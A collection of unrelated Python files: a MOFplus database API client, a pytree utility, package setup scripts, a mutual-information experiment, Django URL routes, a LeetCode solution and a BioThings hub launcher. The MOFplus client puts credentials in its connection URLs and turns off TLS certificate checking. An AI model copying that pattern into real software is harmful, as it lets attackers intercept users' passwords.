                self.pw = os.environ['MFPPW']
            except KeyError:
                logger.warning("Environment credentials not found!")
                logger.info("Get credentials from prompt")
                self.username, self.pw = self._credentials_from_cmd()
        ### read from environment variables to which DB should be connected, default is the global www.mofplus.org
        if api == "admin":
            logger.info("CONNECTING TO ADMIN API")
        ### if MFPDB is set then we connect to localhost
        if 'MFPDB' in os.environ:
            self.location = "LOCAL"
            MFPDBname = os.environ['MFPDB']
        else:
            self.location = 'GLOBAL'
        # now open the connection
        if self.location == 'LOCAL':
            # if we are using a local version and can_use_socks is true then check if MFP_PRXY settings are present
            if can_use_socks and 'MFP_PRXY_IP' in os.environ:
                proxy = {
                    'host' : os.environ["MFP_PRXY_IP"],
                    'port' : '8080',
                    # 'username' : os.environ["MFP_PRXY_USR"],
                    # 'password' : os.environ["MFP_PRXY_PWD"],
                    'is_socks' : True,
                    'socks_type' : 'v5',
                }
                logger.info('Trying to connect to local MOFplus API at localhost/%s via proxy at %s' % (MFPDBname, proxy['host']))
                self.mfp = xmlrpclibex.ServerProxy(
                    'http://%s:%s@localhost/%s/API/%s/xmlrpc' % (self.username, self.pw, MFPDBname, api),
                    timeout = 30,
                    proxy = proxy
                )
            else:
                logger.info('Trying to connect to local MOFplus API at localhost/%s' % MFPDBname)
                self.mfp = xmlrpc.client.ServerProxy('http://%s:%s@localhost/%s/API/%s/xmlrpc' % (self.username, self.pw, MFPDBname, api))
        else:
            logger.info('Trying to connect to global MOFplus API')
            # NOTE(review): TLS certificate verification is disabled here via
            # _create_unverified_context — confirm this is intentional.
            self.mfp = xmlrpc.client.ServerProxy('https://%s:%s@www.mofplus.org/API/%s/xmlrpc' % (self.username, self.pw, api),
                allow_none = True, context = ssl._create_unverified_context())
        self._check_connection(api)
        return

    def _credentials_from_rc(self):
        """
        Method to get the credentials from ~/.mofplusrc
        Returns:
            username (str): username of current user
            pw (str): pw of current user
        """
        mprc_filename = os.environ["HOME"]+'/.mofplusrc'
        # First line holds the username, second line the password.
        with open(mprc_filename, 'r') as mprc:
            username = mprc.readline().split()[0]
            pw = mprc.readline().split()[0]
        return username, pw

    def _credentials_from_cmd(self):
        """
        Method to get the credentials from the command line
        Returns:
            username (str): username of current user
            pw (str): pw of current user
        """
        username = input("Email:")
        pw = getpass.getpass()
        return username, pw

    def _check_connection(self, api):
        """
        Method to check if the connection to MFP is alive
        Raises:
            IOError: If connections is not possible
        """
        try:
            # Cheap round-trip RPC used purely as a liveness/credential check.
            self.mfp.add(2,2)
            logger.info("Connection to %s API established" % api)
            if api == "admin":
                print("""
        We trust you have received the usual lecture from the MOF+ system administrator.
        It usually boils down to these two things:
                #1) Think before you type.
                #2) With great power comes great responsibility.
                """)
        except xmlrpc.client.ProtocolError:
            logger.error("Not possible to connect to MOF+ %s API. Check your credentials" % api)
            raise IOError
        return

    def _print_banner(self):
        """
        Prints the MFP banner
        """
        print(":##::::'##::'#######::'########:::::::::::::::'###::::'########::'####:\n\
:###::'###:'##.... ##: ##.....::::'##::::::::'## ##::: ##.... ##:. ##::\n\
:####'####: ##:::: ##: ##::::::::: ##:::::::'##:. ##:: ##:::: ##:: ##::\n\
:## ### ##: ##:::: ##: ######:::'######::::'##:::. ##: ########::: ##::\n\
:##. #: ##: ##:::: ##: ##...::::.. ##.::::: #########: ##.....:::: ##::\n\
:##:.:: ##: ##:::: ##: ##::::::::: ##:::::: ##.... ##: ##::::::::: ##::\n\
:##:::: ##:. #######:: ##:::::::::..::::::: ##:::: ##: ##::::::::'####:\n\
:..:::::..:::.......:::..:::::::::::::::::::..:::::..::..:::::::::....:")

    @download('topology')
    def get_net(self,netname, out = 'file'):
        """
        Downloads a topology in mfpx file format
        Parameters:
            netname (str): name of the net
            out (str,optional): if 'file', mfpx file is written to file,
                if 'mol' mol object is returned, if 'str' data is returned
                as string, defaults to 'hdd'
        """
        lines = self.mfp.get_net(netname)
        return lines

    def get_list_of_nets(self):
        """
        Returns a list of all topologies stored at MOFplus.
        """
        return self.mfp.get_list_of_nets()

    def get_list_of_bbs(self):
        """
        Returns a list of all building blocks stored at MOFplus.
        """
        return self.mfp.get_list_of_bbs()

    @download('building block')
    def get_bb(self,bbname, out = 'file'):
        """
        Downloads a building block in mfpx file format
        Parameters:
            bbname (str): name of the bb
            out (str,optional): if 'file', mfpx file is written to file,
                if 'mol' mol object is returned, if 'str' data is returned
                as string, defaults to 'hdd'
        """
        lines = self.mfp.get_bb(bbname)
        return lines

    @download('MOF')
    def get_mof_structure_by_id(self,strucid, out='file'):
        """
        Downloads a MOF structure in mfpx file format
        Parameters:
            strucid (str): id of the MOF structure in the DB
            out (str,optional): if 'file', mfpx file is written to file,
                if 'mol' mol object is returned, if 'str' data is returned
                as string, defaults to 'hdd'
        """
        # The RPC also returns the structure's name; only the file lines are used.
        lines,name = self.mfp.get_mof_structure_by_id(strucid)
        return lines

    def get_cs(self,name):
        """
        Returns the coordinations sequences of a topology as a list of lists.
        Parameters:
            name (str): Name of the topology
        """
        return self.mfp.get_cs(name)

    def get_vs(self,name):
        """
        Returns the vertex symbol of a topology as a list of strings.
        Parameters:
            name (str): Name of the topology
        """
        return self.mfp.get_vs(name)

    def search_cs(self, cs, vs, cfilter = True):
        """
        Searches nets with a given coordination sequences and given vertex symbols and returns
        the corresponding netnames as a list of strings.
        Parameters:
            cs (list): List of the coordination sequences
            vs (list): List of the vertex symbols
            cfilter (bool): If True no catenated nets are returned, defaults to True
        """
        assert type(cs) == list
        assert type(vs) == list
        nets = self.mfp.search_cs(cs, vs)
        rl = []
        if cfilter:
            # Names containing '-c' denote catenated nets; collect and drop them.
            for i,n in enumerate(nets):
                if n.find('-c') != -1: rl.append(n)
            for i in rl: nets.remove(i)
        return nets

    @download('topology')
    def get_scaledtopo(self,id, out = 'file'):
        """
        Gets the scaled topo file for a given supercell id.
        Parameters:
            id(int): if of the supercell entry in the db for which
                the scaledtopo is requested
            out (str,optional): if 'file', mfpx file is written to file,
                if 'mol' mol object is returned, if 'str' data is returned
                as string, defaults to 'hdd'
        """
        lines = self.mfp.get_scaledtopo(id)
        return lines

    @download('orients')
    def get_orients(self,id):
        """
        Gets the orients file for a given supercell id.
        Parameters:
            id(int): id of the supercell entry in the db for which
                the orients file is requested
        """
        lines = self.mfp.get_orients(id)
        return lines
|
from typing import NamedTuple, Callable, Any, Tuple, List, Dict, Type, cast, Optional
"""
Contains utility functions for working with nested python data structures.
A *pytree* is Python nested data structure. It is a tree in the sense that
nodes are Python collections (e.g., list, tuple, dict) and the leaves are
Python values. Furthermore, a pytree should not contain reference cycles.
pytrees are useful for working with nested collections of Tensors. For example,
one can use `tree_map` to map a function over all Tensors inside some nested
collection of Tensors and `tree_unflatten` to get a flat list of all Tensors
inside some nested collection. pytrees are helpful for implementing nested
collection support for PyTorch APIs.
This pytree implementation is not very performant due to Python overhead
To improve the performance we can move parts of the implementation to C++.
"""
# A NodeDef holds two callables:
# - flatten_fn should take the collection and return a flat list of values.
# It can also return some context that is used in reconstructing the
# collection.
# - unflatten_fn should take a flat list of values and some context
# (returned by flatten_fn). It returns the collection by reconstructing
# it from the list and the context.
# Type aliases: a "context" is whatever a flatten_fn needs to rebuild its
# node; a PyTree is any nested combination of registered container types.
Context = Any
PyTree = Any
FlattenFunc = Callable[[PyTree], Tuple[List, Context]]
UnflattenFunc = Callable[[List, Context], PyTree]

class NodeDef(NamedTuple):
    # The flatten/unflatten callable pair registered for one container type.
    flatten_fn: FlattenFunc
    unflatten_fn: UnflattenFunc

# Registry mapping container type -> its NodeDef.
SUPPORTED_NODES: Dict[Type[Any], NodeDef] = {}
def _register_pytree_node(typ: Any, flatten_fn: FlattenFunc, unflatten_fn: UnflattenFunc) -> None:
    """Register the flatten/unflatten callables for container type *typ*."""
    node_def = NodeDef(flatten_fn, unflatten_fn)
    SUPPORTED_NODES[typ] = node_def
def _dict_flatten(d: Dict[Any, Any]) -> Tuple[List[Any], Context]:
    """Flatten a dict to its values; the key list (in order) is the context."""
    keys = list(d.keys())
    values = [d[key] for key in keys]
    return values, keys
def _dict_unflatten(values: List[Any], context: Context) -> Dict[Any, Any]:
    """Rebuild a dict by pairing the context keys with the flat values."""
    return dict(zip(context, values))
def _list_flatten(d: List[Any]) -> Tuple[List[Any], Context]:
    """A list is already flat; no context is needed.

    Note: the list itself is returned (not a copy), matching the original.
    """
    context = None
    return d, context
def _list_unflatten(values: List[Any], context: Context) -> List[Any]:
    """Rebuild a list from the flat values; the context is unused."""
    rebuilt = list(values)
    return rebuilt
def _tuple_flatten(d: Tuple[Any, ...]) -> Tuple[List[Any], Context]:
    """Flatten a tuple to a list of its elements; no context is needed."""
    elements = [item for item in d]
    return elements, None
def _tuple_unflatten(values: List[Any], context: Context) -> Tuple[Any, ...]:
    """Rebuild a tuple from the flat values; the context is unused."""
    rebuilt = tuple(values)
    return rebuilt
# Built-in container registrations: dict, list and tuple are pytree nodes.
_register_pytree_node(dict, _dict_flatten, _dict_unflatten)
_register_pytree_node(list, _list_flatten, _list_unflatten)
_register_pytree_node(tuple, _tuple_flatten, _tuple_unflatten)
# A leaf is defined as anything that is not a Node.
def _is_leaf(pytree: PyTree) -> bool:
    """Return True when *pytree* is not a registered container type."""
    # Membership tests directly on the dict; the previous `.keys()` call
    # built a needless view object.
    return type(pytree) not in SUPPORTED_NODES
# A TreeSpec represents the structure of a pytree. It holds:
# "type": the type of root Node of the pytree
# context: some context that is useful in unflattening the pytree
# children_specs: specs for each child of the root Node
# num_leaves: the number of leaves
class TreeSpec:
    """Structure description of a pytree: the root node type, its context,
    and a spec for each child. num_leaves is the subtree's total leaf count."""

    def __init__(self, typ: Any, context: Context, children_specs: List['TreeSpec']) -> None:
        self.type = typ
        self.context = context
        self.children_specs = children_specs
        self.num_leaves: int = sum(spec.num_leaves for spec in children_specs)

    def __repr__(self) -> str:
        return f'TreeSpec({self.type.__name__}, {self.context}, {self.children_specs})'

    def __eq__(self, other: Any) -> bool:
        same = (
            self.type == other.type
            and self.context == other.context
            and self.children_specs == other.children_specs
            and self.num_leaves == other.num_leaves
        )
        # This should really not be necessary, but mypy errors out without it.
        return cast(bool, same)

    def __ne__(self, other: Any) -> bool:
        return not self.__eq__(other)
class LeafSpec(TreeSpec):
    """Spec for a single leaf value; prints as '*'."""

    def __init__(self) -> None:
        super().__init__(None, None, [])
        # A leaf always counts as exactly one value.
        self.num_leaves = 1

    def __repr__(self) -> str:
        return '*'
def tree_flatten(pytree: PyTree) -> Tuple[List[Any], TreeSpec]:
    """Flattens a pytree into a list of values and a TreeSpec that can be used
    to reconstruct the pytree.
    """
    if _is_leaf(pytree):
        return [pytree], LeafSpec()

    node_type = type(pytree)
    child_pytrees, context = SUPPORTED_NODES[node_type].flatten_fn(pytree)

    # Recursively flatten each child, accumulating leaves and child specs.
    leaves: List[Any] = []
    specs: List['TreeSpec'] = []
    for child in child_pytrees:
        child_leaves, child_spec = tree_flatten(child)
        leaves.extend(child_leaves)
        specs.append(child_spec)
    return leaves, TreeSpec(node_type, context, specs)
def tree_unflatten(values: List[Any], spec: TreeSpec) -> PyTree:
    """Given a list of values and a TreeSpec, builds a pytree.
    This is the inverse operation of `tree_flatten`.
    """
    if not isinstance(spec, TreeSpec):
        raise ValueError(
            f'tree_unflatten(values, spec): Expected `spec` to be instance of '
            f'TreeSpec but got item of type {type(spec)}.')
    if len(values) != spec.num_leaves:
        raise ValueError(
            f'tree_unflatten(values, spec): `values` has length {len(values)} '
            f'but the spec refers to a pytree that holds {spec.num_leaves} '
            f'items ({spec}).')
    if isinstance(spec, LeafSpec):
        return values[0]

    # Slice out each child's leaves by its leaf count, recurse, then rebuild
    # the container from the children and the stored context.
    unflatten_fn = SUPPORTED_NODES[spec.type].unflatten_fn
    children = []
    offset = 0
    for child_spec in spec.children_specs:
        next_offset = offset + child_spec.num_leaves
        children.append(tree_unflatten(values[offset:next_offset], child_spec))
        offset = next_offset
    return unflatten_fn(children, spec.context)
# Broadcasts a pytree to the provided TreeSpec and returns the flattened
# values. If this is not possible, then this function returns None.
#
# For example, given pytree=0 and spec=TreeSpec(list, None, [LeafSpec(), LeafSpec()]),
# would return [0, 0]. This is useful for part of the vmap implementation:
# a user can pass in vmap(fn, in_dims)(*inputs). `in_dims` should be
# broadcastable to the tree structure of `inputs` and we use
# _broadcast_to_and_flatten to check this.
def _broadcast_to_and_flatten(pytree: PyTree, spec: TreeSpec) -> Optional[List[Any]]:
    """Broadcast *pytree* against *spec* and return its flattened values,
    or None when the two structures are incompatible.
    """
    assert isinstance(spec, TreeSpec)

    if _is_leaf(pytree):
        # A single value broadcasts to every leaf position in the spec.
        return [pytree] * spec.num_leaves
    if isinstance(spec, LeafSpec):
        return None
    if type(pytree) != spec.type:
        return None

    child_pytrees, ctx = SUPPORTED_NODES[type(pytree)].flatten_fn(pytree)
    # The node must match the spec in both arity and context.
    if len(child_pytrees) != len(spec.children_specs) or ctx != spec.context:
        return None

    flattened: List[Any] = []
    for child, child_spec in zip(child_pytrees, spec.children_specs):
        child_flat = _broadcast_to_and_flatten(child, child_spec)
        if child_flat is None:
            return None
        flattened.extend(child_flat)
    return flattened
|
__author__ = 'Suyash Soni'
__email__ = 'suyash.soni248@gmail.com'
import os
from setuptools import setup, find_packages
from src.conf.settings import VERSION
def curr_version():
    """Return the package version configured for the repository named in the
    PY_REPO environment variable (raises KeyError when unset/unknown)."""
    py_repo = os.environ['PY_REPO']
    version = VERSION[py_repo]
    message = '[SETUP] Preparing sqlalchemy_json_querybuilder-{version} to upload to {py_repo}'.format(
        version=version, py_repo=py_repo
    )
    print(message)
    return version
# Package metadata; the sources live under lib/ (see package_dir).
setup(
    name='sqlalchemy_json_querybuilder',
    version=curr_version(),
    author='Suyash Soni',
    author_email='suyash.soni248@gmail.com',
    maintainer="Suyash Soni",
    description='Querybuilder to use SqlAlchemy ORM by feeding JSON/object as input',
    long_description=open('README.md').read(),
    long_description_content_type='text/markdown',
    url='https://github.com/suyash248/sqlalchemy-json-querybuilder',
    packages=find_packages('lib'),
    package_dir={
        '': 'lib'
    },
    python_requires='>=3',
    install_requires=[
        'sqlalchemy'
    ],
    classifiers=[
        'Operating System :: OS Independent',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3'
    ]
)
#import tensorflow as tf
import matplotlib
matplotlib.use('Agg')
import numpy as np
import matplotlib.pyplot as plt
import sys
sys.path.append("..")
from gaussian_dataset import generate_dataset
from simple_mine_refact import SimpleMINE
from grad_corrected_mine import GradMINE
from simple_mine_f import MINEf
import time
import datetime
# Run identifier: timestamp + experiment tag + dimensionality.
date = datetime.datetime.now().strftime("%Y%m%d-%H%M%S")

# Dataset parameters.
dimension = 180
corr_factors = [0, 0.1, 0.3, 0.5, 0.7, 0.9, 0.99]
# Mirror the positive factors onto the negative side and drop the duplicated
# zero, so the sweep runs -0.99 .. 0 .. 0.99 without repeats.
corr_neg = [-corr for corr in corr_factors]
corr_neg.reverse()
corr_factor_ls = corr_neg[:-1] + corr_factors
n_samples_train = 100000
n_samples_test = 30000
name = "{}_all_MINE_{}".format(date, dimension)

# Model hyper-parameters shared by all three estimators.
params = {
    "batch_size": 256,
    "learning_rate": 1e-4,
    "input_dim": dimension,
    "ema_decay": 0.999
}

# Training schedule.
max_it = 80000
stat_every = 10000

# Result accumulators, one entry per correlation factor.
theoric_I = []
estimated_I = []
estimated_I_grad = []
estimated_I_f = []
#%%
for i, corr in enumerate(corr_factor_ls):
    # Build one training set and one test set per correlation factor.
    inputs_x, inputs_z, _ = generate_dataset(dimension, corr, n_samples_train)
    test_inputs_x, test_inputs_z, mut_info = generate_dataset(dimension, corr, n_samples_test)
    # A shuffled copy of z provides samples from the product of the marginals,
    # which the MINE estimators need alongside the joint samples.
    test_inputs_z_hat = np.copy(test_inputs_z)
    np.random.shuffle(test_inputs_z_hat)
    print("Mutual Information for %ith test dataset is: %s" % (i, str(mut_info)))
    theoric_I.append(mut_info)
    # Initialise the results to NaN so a failure in any train/eval step cannot
    # leave these names unbound (the original raised NameError at the appends
    # below whenever the very first try-block failed).
    test_I = test_I_grad = test_I_f = np.nan
    # --- Simple MINE ---
    model = SimpleMINE(params)
    try:
        model.train(inputs_x, inputs_z, max_it, stat_every)
    except Exception as e:
        # was "type error: ...", which mislabelled arbitrary failures
        print("training error (SimpleMINE): " + str(e))
    print("Mutual Information for %ith test dataset is: %s" % (i, str(mut_info)))
    try:
        test_I = model.sess.run(model.loss, feed_dict={model.x: test_inputs_x, model.z: test_inputs_z, model.z_hat: test_inputs_z_hat})
    except Exception as e:
        print("evaluation error (SimpleMINE): " + str(e))
    # --- Gradient-corrected MINE ---
    model_grad = GradMINE(params)
    try:
        model_grad.train(inputs_x, inputs_z, max_it, stat_every)
    except Exception as e:
        print("training error (GradMINE): " + str(e))
    try:
        test_I_grad = model_grad.sess.run(model_grad.loss, feed_dict={model_grad.x: test_inputs_x, model_grad.z: test_inputs_z, model_grad.z_hat: test_inputs_z_hat})
    except Exception as e:
        print("evaluation error (GradMINE): " + str(e))
    # --- MINE-f ---
    model_f = MINEf(params)
    try:
        model_f.train(inputs_x, inputs_z, max_it, stat_every)
    except Exception as e:
        print("training error (MINEf): " + str(e))
    try:
        test_I_f = model_f.sess.run(model_f.loss, feed_dict={model_f.x: test_inputs_x, model_f.z: test_inputs_z, model_f.z_hat: test_inputs_z_hat})
    except Exception as e:
        print("evaluation error (MINEf): " + str(e))
    print("Estimated Simple Mutual Information for %ith test dataset is: %s" % (i, str(test_I)))
    print("Estimated Grad Mutual Information for %ith test dataset is: %s" % (i, str(test_I_grad)))
    print("Estimated f Mutual Information for %ith test dataset is: %s" % (i, str(test_I_f)))
    estimated_I.append(test_I)
    estimated_I_grad.append(test_I_grad)
    estimated_I_f.append(test_I_f)
#%%
# Echo the final results to stdout.
print("IM teorica")
print(theoric_I)
print("IM simple MINE")
print(estimated_I)
print("IM grad MINE")
print(estimated_I_grad)
print("IM MINE_f")
print(estimated_I_f)
# Append the same summary to the run log. Open the file once: the original
# re-opened it for every print() and never closed any of the handles.
log_path = 'results/' + name + '_train.log'
with open(log_path, 'a') as log_file:
    print("IM teorica", file=log_file)
    print(theoric_I, file=log_file)
    print("IM simple MINE", file=log_file)
    print(estimated_I, file=log_file)
    print("IM grad MINE", file=log_file)
    print(estimated_I_grad, file=log_file)
    print("IM MINE_f", file=log_file)
    print(estimated_I_f, file=log_file)
#%%
#import matplotlib
#matplotlib.use('Agg')
#import numpy as np
#import matplotlib.pyplot as plt
# Create plots with pre-defined labels.
#dimension = 20
#name = "all_mine"
#corr_factors = [0, 0.1, 0.3, 0.5, 0.7, 0.9, 0.99]#[0, 0.3, 0.99]
#corr_neg = [-corr for corr in corr_factors][::-1]
#corr_factor_ls = corr_neg[0:len(corr_neg)-1]+corr_factors
#theoric_I = [39.170355472516874, 16.607312068216512, 6.733445532637656, 2.8768207245178083, 0.9431067947124133, 0.10050335853501455, -0.0, 0.10050335853501455, 0.9431067947124133, 2.8768207245178083, 6.733445532637656, 16.607312068216512, 39.170355472516874]
#estimated_I = [np.nan, np.nan, np.nan, 2.3143282, 0.8775661, 0.069535024, -0.026147725, 0.07246518, 0.86943215, 2.5712926, np.nan, np.nan, np.nan]
#estimated_I_grad = [4.4733887, 2.7001667, 6.024006, 2.699387, 0.8863009, 0.074488044, -0.021217227, 0.07841396, 0.86781573, 2.5571303, 5.5366993, 11.926083, 13.178387]
#estimated_I_f = [18.260582, 12.114112, 3.2008615, 2.779146, 0.8839741, 0.07127565, -0.023192942, 0.076206625, 0.8925297, 2.5285978, 6.1364875, 11.3494215, 19.390987]
#dimension=180
#IM teorica
#[352.53319925265197, 149.4658086139486, 60.60100979373875, 25.89138652066023, 8.48796115241175, 0.9045302268151266, -0.0, 0.9045302268151266, 8.48796115241175, 25.89138652066023, 60.60100979373875, 149.4658086139486, 352.53319925265197]
#IM simple MINE
#[nan, nan, nan, nan, 2.0991511, -0.0598675, -0.30358177, -0.06523633, 1.5352504, nan, nan, nan, nan]
#IM grad MINE
#[nan, 3.0846558, 8.46356, 5.5037537, 2.1676087, 0.013367176, -0.28315628, 0.02129507, 2.3358266, 4.492078, 5.1288576, 7.180626, nan]
#IM MINE_f
#[15.281321, 14.355327, 3.0857368, 3.2455711, 1.9532733, -0.027747154, -0.2884177, -0.016965985, 2.1113505, 2.9029574, 7.950784, 6.2512007, 12.364767]
# Plot the true MI against the three estimators over the correlation sweep.
# Each estimator is drawn twice: a line carrying the legend label, plus star
# markers at the measured points (plot order determines draw/z-order).
fig, ax = plt.subplots()
ax.plot(corr_factor_ls, theoric_I, 'b--', label='True MI')
ax.plot(corr_factor_ls, estimated_I_f, 'g*')
ax.plot(corr_factor_ls, estimated_I_f, 'g-', label='MINE_f MI')
ax.plot(corr_factor_ls, estimated_I_grad, 'r-', label='Grad MINE')
ax.plot(corr_factor_ls, estimated_I_grad, 'r*')
ax.plot(corr_factor_ls, estimated_I, 'b-', label='Simple MINE')
ax.plot(corr_factor_ls, estimated_I, 'b*')
ax.set_ylabel(r'$I(X_a;X_b)$', fontsize=15)
ax.set_xlabel(r'$\rho$', fontsize=15)
ax.set_title('Mutual Information of %i-dimensional variables' % (dimension))
ax.grid(True)
legend = ax.legend(loc='upper center', shadow=True, fontsize='x-large')
# Put a nicer background color on the legend.
legend.get_frame().set_facecolor('#00FFCC')
fig.tight_layout()
# Save under the timestamped run name next to the text log.
fig.savefig('results/'+name+'.png', bbox_inches='tight')
#plt.show()
|
from django.contrib import admin
from django.urls import path, include
from rest_framework import routers
from .core import views
# DRF router: exposes the REST endpoints mounted under /api/ below.
router = routers.DefaultRouter()
router.register(r'orders', views.OrderViewSet)
router.register(r'products', views.ProductViewSet)
# router.register(r'productorders', views.ProductOrderViewSet)
# NOTE(review): trailing slashes are inconsistent across routes (e.g.
# 'orders/<int:pk>/delete' vs 'orders/<int:pk>/checkout/'); changing them
# would break existing links, so they are only flagged here.
urlpatterns = [
    path('', views.index, name='index'),
    # Order CRUD and status transitions
    path('orders/',
         views.OrderListView.as_view(), name='order'),
    path('orders/<int:pk>/',
         views.OrderUpdateView.as_view(), name='order-update'),
    path('orders/<int:pk>/delete',
         views.OrderDeleteView.as_view(), name='order-delete'),
    path('orders/<int:pk>/checkout/',
         views.OrderStatusToPendingView.as_view(), name='order-checkout'),
    path('orders/<int:pk>/dispatch/',
         views.OrderStatusToDispatchedView.as_view(), name='order-dispatch'),
    path('orders/<int:pk>/items/<int:item_pk>',
         views.OrderItemUpdateView.as_view(), name='order-item-update'),
    path('orders/<int:pk>/items/<int:item_pk>/delete',
         views.OrderItemDeleteView.as_view(), name='order-item-delete'),
    # Product CRUD
    path('products/',
         views.ProductListView.as_view(), name='product'),
    path('products/add',
         views.ProductCreateView.as_view(), name='product-create'),
    path('products/<int:pk>',
         views.ProductUpdateView.as_view(), name='product-update'),
    path('products/<int:pk>/delete',
         views.ProductDeleteView.as_view(), name='product-delete'),
    # Admin, auth and the REST API
    path('admin/', admin.site.urls),
    path('accounts/', include('django.contrib.auth.urls')),
    path('api/', include(router.urls)),
]
|
from setuptools import setup
project_name = 'requests-ntlm2'

# PyPI renders reStructuredText; the Markdown README is converted via pandoc
# (through pypandoc) when available, otherwise the description stays empty.
try:
    import pypandoc
    long_description = pypandoc.convert('README.md', 'rst')
except ImportError:
    long_description = ''

# Runtime dependencies (requests is pinned, ntlmlib is a minimum).
requires = ["requests == 2.5.0", "ntlmlib >= 0.72"]
setup(
    name=project_name,
    # Version must be a string (PEP 440); the original passed the float 0.01,
    # which setuptools only tolerates by coercing via str(). '0.01' preserves
    # the exact rendered value.
    version='0.01',
    description='Python library to use Requests NTLMv1 or NTLMv2',
    long_description=long_description,
    keywords='requests ntlm ntlmv2 ntlmv1 http'.split(' '),
    author='Ian Clegg',
    author_email='ian.clegg@sourcewarp.com',
    url='https://github.com/ianclegg/',
    license='MIT license',
    packages=['requests_ntlm2'],
    install_requires=requires,
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Environment :: Console',
        'Intended Audience :: Developers',
        'Intended Audience :: System Administrators',
        'Natural Language :: English',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.6',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.2',
        'Programming Language :: Python :: 3.3',
        'Programming Language :: Python :: Implementation :: PyPy',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Topic :: System :: Distributed Computing',
        'Topic :: System :: Systems Administration',
    ],
)
|
# -*- coding: utf-8 -*-
# @Author : LG
"""
执行用时:40 ms, 在所有 Python3 提交中击败了90.60% 的用户
内存消耗:13.7 MB, 在所有 Python3 提交中击败了68.93% 的用户
解题思路:
动态规划
例: 1,17,5,10,13,15,10,5,16,8
1 17 5 10 13 15 10 5 16 8
↗ 0 ↗ 1 ↘ → 1 ↗ 3 ↗ 3 ↗ 3 ↘ → 3 ↘ → 3 ↗ 5 ↘ → 5
↘ 0 ↗ → 0 ↘ 2 ↗ → 2 ↗ → 2 ↗ → 2 ↘ 4 ↘ 4 ↗ → 4 ↘ 6
n 1 2 3 4 4 4 5 5 6 7
使用dp[0][i]保存上升的结果,使用dp[1][i]表示下降的结果
nums[i] > nums[i+1]时,上升
dp[0][i] = dp[1][i-1] + 1 当前数值在上一个下降时的数值基础上+1
dp[1][i] = dp[1][i-1] 当前数字下降等于前一个下降时的数值,保持不变
nums[i] < nums[i+1]时,下降
dp[0][i] = dp[0][i-1] 当前数值上升等于前一个数上升时的数值,保持不变
dp[1][i] = dp[0][i-1] + 1 当前数字下降在前一个数上升的数值基础上+1
nums[i] == nums[i+1]时,等于
dp[0][i] = dp[0][i - 1] 上升下降均保持不变
dp[1][i] = dp[1][i - 1]
"""
from typing import List  # fixes NameError: List was used below without import


class Solution:
    def wiggleMaxLength(self, nums: List[int]) -> int:
        """Return the length of the longest wiggle subsequence of nums.

        A wiggle sequence strictly alternates between rising and falling
        differences. Only the previous row of the original dp table is ever
        read, so it collapses to two counters: `up` / `down` hold the best
        alternation counts for sequences ending on a rise / fall.
        Equal neighbours extend neither. O(n) time, O(1) space.
        """
        n = len(nums)
        if n == 0:
            return 0
        up = down = 0
        for i in range(1, n):
            if nums[i] > nums[i - 1]:
                # a rise extends the best sequence that last fell
                up = down + 1
            elif nums[i] < nums[i - 1]:
                # a fall extends the best sequence that last rose
                down = up + 1
        # +1 converts "number of direction changes" into sequence length
        return max(up, down) + 1
#!/usr/bin/env python
import os, logging
# shut some mouths
logging.getLogger("botocore").setLevel(logging.ERROR)
logging.getLogger("boto").setLevel(logging.ERROR)
logging.getLogger("s3transfer").setLevel(logging.ERROR)
logging.getLogger("urllib3").setLevel(logging.ERROR)
import config, biothings
from biothings.utils.version import set_versions
# app_folder = parent of the directory containing this script
app_folder,_src = os.path.split(os.path.split(os.path.abspath(__file__))[0])
set_versions(config,app_folder)
biothings.config_for_app(config)
# NOTE(review): this rebinds the name `logging`, shadowing the stdlib module
# imported above; from here on `logging` is the app's configured logger.
logging = config.logger
from biothings.hub import HubServer
import hub.dataload.sources
# Default server instance (used when no --api-folder is given).
server = HubServer(hub.dataload.sources,name="BioThings Studio")
if __name__ == "__main__":
    # vanilla or as a launcher of an API
    from optparse import OptionParser
    import os, sys, glob, re
    parser = OptionParser()
    parser.add_option("-a","--api-folder",help="API folder to run", dest="api_folder")
    (options, args) = parser.parse_args()
    if options.api_folder:
        # Launcher mode: run the hub defined inside the given API folder.
        api_folder = os.path.abspath(options.api_folder)
        # NOTE(review): typo "Lauching" in the log message below.
        logging.info("Lauching server from API located in: %s" % api_folder)
        origwd = os.path.abspath(os.path.curdir)
        # assuming a bin/hub.py module in this folder
        os.chdir(api_folder)
        assert "bin" in os.listdir(), "Can't find 'bin' folder containing hub.py"
        scripts = glob.glob(os.path.join("bin","*.py"))
        print(scripts)
        startup = None
        if len(scripts) == 1:
            startup = scripts.pop()
        else:
            if "bin/hub.py" in scripts:
                startup = scripts[scripts.index("bin/hub.py")]
            else:
                logging.error("Found more than one startup scripts, none of them named hub.py, " + \
                              "don't know which to choose: %s" % scripts)
                sys.exit(1)
        logging.info("Found startup script '%s'" % startup)
        # Convert the script path to a dotted module path and import it.
        strmod = re.sub(".py$","",startup).replace("/",".")
        import importlib
        mod = importlib.import_module(strmod)
        from biothings.hub import HubServer
        # try to locate a hub server instance
        for name in dir(mod):
            server = getattr(mod,name)
            if issubclass(server.__class__,HubServer):
                logging.info("Found hub server: %s" % server)
                # replace sources, dynamic discovery
                if os.path.exists("hub/dataload/sources"):
                    server.source_list = "hub/dataload/sources"
                    logging.info("Auto-discovering sources in 'hub/dataload/sources'")
                else:
                    logging.warning("Couldn't locate sources folder (expecting 'hub/dataload/sources'), keep those defined by the API")
                break
    else:
        # NOTE(review): typo "Runing" in the log message below.
        logging.info("Runing vanilla studio")
    logging.info("Hub DB backend: %s" % biothings.config.HUB_DB_BACKEND)
    logging.info("Hub database: %s" % biothings.config.DATA_HUB_DB_DATABASE)
    server.start()
|
# coding=utf-8
import csv as csv
from pipelines.auxmod.auxiliary import read_chromsizes, open_comp, check_bounds
def process_ucsc_cgi(inputfile, outputfile, boundcheck, nprefix):
    """
    Normalize a UCSC CpG-island track file into a sorted, renamed table.

    Regions are bounds-checked against a chromosome sizes file, sorted by
    (chromosome, start, end), renumbered as <nprefix>_<i>, and written out
    with a fixed header.

    :param inputfile: path to the (possibly compressed) UCSC CGI track file
    :param outputfile: path of the table to write
    :param boundcheck: chromosome sizes file used for bounds checking
    :param nprefix: prefix for the regenerated region names
    :return: outputfile
    """
    bounds = read_chromsizes(boundcheck)
